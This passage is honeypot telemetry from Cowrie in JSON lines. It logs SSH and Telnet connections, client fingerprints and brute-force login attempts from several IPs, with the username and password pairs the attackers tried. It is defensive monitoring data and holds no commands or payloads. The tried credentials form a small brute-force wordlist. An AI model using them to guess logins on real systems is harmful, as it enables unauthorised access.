s":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:36:29.308649Z","src_ip":"152.32.129.236","session":"9f7e6080329e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:36:30.377973Z","src_ip":"152.32.129.236","session":"9f7e6080329e"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:36:31.637347Z","src_ip":"152.32.129.236","session":"9f7e6080329e"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":34852,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4febd425a3e","protocol":"ssh","message":"New connection: 152.32.129.236:34852 (1.2.3.4:22) [session: d4febd425a3e]","sensor":"my-vps","timestamp":"2025-09-09T00:36:31.894566Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:36:31.895573Z","src_ip":"152.32.129.236","session":"d4febd425a3e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:36:32.153466Z","src_ip":"152.32.129.236","session":"d4febd425a3e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:36:33.226343Z","src_ip":"152.32.129.236","session":"d4febd425a3e"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:36:33.486054Z","src_ip":"152.32.129.236","session":"719018f64dcd"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:36:33.486937Z","src_ip":"152.32.129.236","session":"d4febd425a3e"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":54860,"dst_ip":"1.2.3.4","dst_port":22,"session":"717c1537c5c8","protocol":"ssh","message":"New connection: 43.156.132.147:54860 (1.2.3.4:22) [session: 717c1537c5c8]","sensor":"my-vps","timestamp":"2025-09-09T00:36:50.729795Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:36:50.730759Z","src_ip":"43.156.132.147","session":"717c1537c5c8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:36:50.983956Z","src_ip":"43.156.132.147","session":"717c1537c5c8"}
{"eventid":"cowrie.login.failed","username":"test2","password":"123","message":"login attempt [test2/123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:36:52.038940Z","src_ip":"43.156.132.147","session":"717c1537c5c8"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:36:53.295461Z","src_ip":"43.156.132.147","session":"717c1537c5c8"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":36853,"dst_ip":"1.2.3.4","dst_port":22,"session":"037b1beaa36d","protocol":"ssh","message":"New connection: 103.100.209.195:36853 (1.2.3.4:22) [session: 037b1beaa36d]","sensor":"my-vps","timestamp":"2025-09-09T00:37:15.132369Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:37:15.135832Z","src_ip":"103.100.209.195","session":"037b1beaa36d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:37:15.345661Z","src_ip":"103.100.209.195","session":"037b1beaa36d"}
{"eventid":"cowrie.login.failed","username":"stack","password":"123","message":"login attempt [stack/123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:37:16.205186Z","src_ip":"103.100.209.195","session":"037b1beaa36d"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":38934,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a97dab9ab49","protocol":"ssh","message":"New connection: 5.202.105.236:38934 (1.2.3.4:22) [session: 9a97dab9ab49]","sensor":"my-vps","timestamp":"2025-09-09T00:37:17.029985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:37:17.060579Z","src_ip":"5.202.105.236","session":"9a97dab9ab49"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:37:17.208572Z","src_ip":"5.202.105.236","session":"9a97dab9ab49"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:37:17.427659Z","src_ip":"103.100.209.195","session":"037b1beaa36d"}
{"eventid":"cowrie.login.failed","username":"cloud","password":"123","message":"login attempt [cloud/123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:37:17.792340Z","src_ip":"5.202.105.236","session":"9a97dab9ab49"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:37:18.952368Z","src_ip":"5.202.105.236","session":"9a97dab9ab49"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":52844,"dst_ip":"1.2.3.4","dst_port":22,"session":"1447b90b1c23","protocol":"ssh","message":"New connection: 51.250.72.176:52844 (1.2.3.4:22) [session: 1447b90b1c23]","sensor":"my-vps","timestamp":"2025-09-09T00:37:42.528838Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:37:42.529692Z","src_ip":"51.250.72.176","session":"1447b90b1c23"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:37:42.562030Z","src_ip":"51.250.72.176","session":"1447b90b1c23"}
{"eventid":"cowrie.login.failed","username":"dennis","password":"dennis","message":"login attempt [dennis/dennis] failed","sensor":"my-vps","timestamp":"2025-09-09T00:37:42.732818Z","src_ip":"51.250.72.176","session":"1447b90b1c23"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:37:43.768296Z","src_ip":"51.250.72.176","session":"1447b90b1c23"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":49478,"dst_ip":"1.2.3.4","dst_port":22,"session":"0356d42e58e3","protocol":"ssh","message":"New connection: 152.32.129.236:49478 (1.2.3.4:22) [session: 0356d42e58e3]","sensor":"my-vps","timestamp":"2025-09-09T00:37:49.434915Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:37:49.435544Z","src_ip":"152.32.129.236","session":"0356d42e58e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:37:49.693609Z","src_ip":"152.32.129.236","session":"0356d42e58e3"}
{"eventid":"cowrie.login.failed","username":"status","password":"qwerty","message":"login attempt [status/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T00:37:50.766328Z","src_ip":"152.32.129.236","session":"0356d42e58e3"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:37:52.027459Z","src_ip":"152.32.129.236","session":"0356d42e58e3"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":47822,"dst_ip":"1.2.3.4","dst_port":22,"session":"0231c346a3d1","protocol":"ssh","message":"New connection: 43.156.132.147:47822 (1.2.3.4:22) [session: 0231c346a3d1]","sensor":"my-vps","timestamp":"2025-09-09T00:38:04.368652Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:38:04.369393Z","src_ip":"43.156.132.147","session":"0231c346a3d1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:38:04.631499Z","src_ip":"43.156.132.147","session":"0231c346a3d1"}
{"eventid":"cowrie.login.failed","username":"robot","password":"robot","message":"login attempt [robot/robot] failed","sensor":"my-vps","timestamp":"2025-09-09T00:38:05.729588Z","src_ip":"43.156.132.147","session":"0231c346a3d1"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:38:06.993151Z","src_ip":"43.156.132.147","session":"0231c346a3d1"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":49799,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffd8fbb3b8cd","protocol":"ssh","message":"New connection: 103.100.209.195:49799 (1.2.3.4:22) [session: ffd8fbb3b8cd]","sensor":"my-vps","timestamp":"2025-09-09T00:38:28.194177Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:38:28.201969Z","src_ip":"103.100.209.195","session":"ffd8fbb3b8cd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:38:28.402398Z","src_ip":"103.100.209.195","session":"ffd8fbb3b8cd"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T00:38:29.209278Z","src_ip":"103.100.209.195","session":"ffd8fbb3b8cd"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:38:30.420556Z","src_ip":"103.100.209.195","session":"ffd8fbb3b8cd"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":60276,"dst_ip":"1.2.3.4","dst_port":22,"session":"56950b79494d","protocol":"ssh","message":"New connection: 5.202.105.236:60276 (1.2.3.4:22) [session: 56950b79494d]","sensor":"my-vps","timestamp":"2025-09-09T00:38:33.760155Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:38:33.779104Z","src_ip":"5.202.105.236","session":"56950b79494d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:38:33.933160Z","src_ip":"5.202.105.236","session":"56950b79494d"}
{"eventid":"cowrie.login.failed","username":"stack","password":"123","message":"login attempt [stack/123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:38:34.521670Z","src_ip":"5.202.105.236","session":"56950b79494d"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:38:35.677611Z","src_ip":"5.202.105.236","session":"56950b79494d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41594,"dst_ip":"1.2.3.4","dst_port":23,"session":"ac63a3fa536d","protocol":"telnet","message":"New connection: 212.227.235.229:41594 (1.2.3.4:23) [session: ac63a3fa536d]","sensor":"my-vps","timestamp":"2025-09-09T00:38:49.919799Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57740,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2c1357910a3","protocol":"ssh","message":"New connection: 217.72.205.35:57740 (1.2.3.4:22) [session: b2c1357910a3]","sensor":"my-vps","timestamp":"2025-09-09T00:39:10.361298Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:39:10.362412Z","src_ip":"217.72.205.35","session":"b2c1357910a3"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":59008,"dst_ip":"1.2.3.4","dst_port":22,"session":"2623690e9743","protocol":"ssh","message":"New connection: 152.32.129.236:59008 (1.2.3.4:22) [session: 2623690e9743]","sensor":"my-vps","timestamp":"2025-09-09T00:39:10.712667Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:39:10.713436Z","src_ip":"152.32.129.236","session":"2623690e9743"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 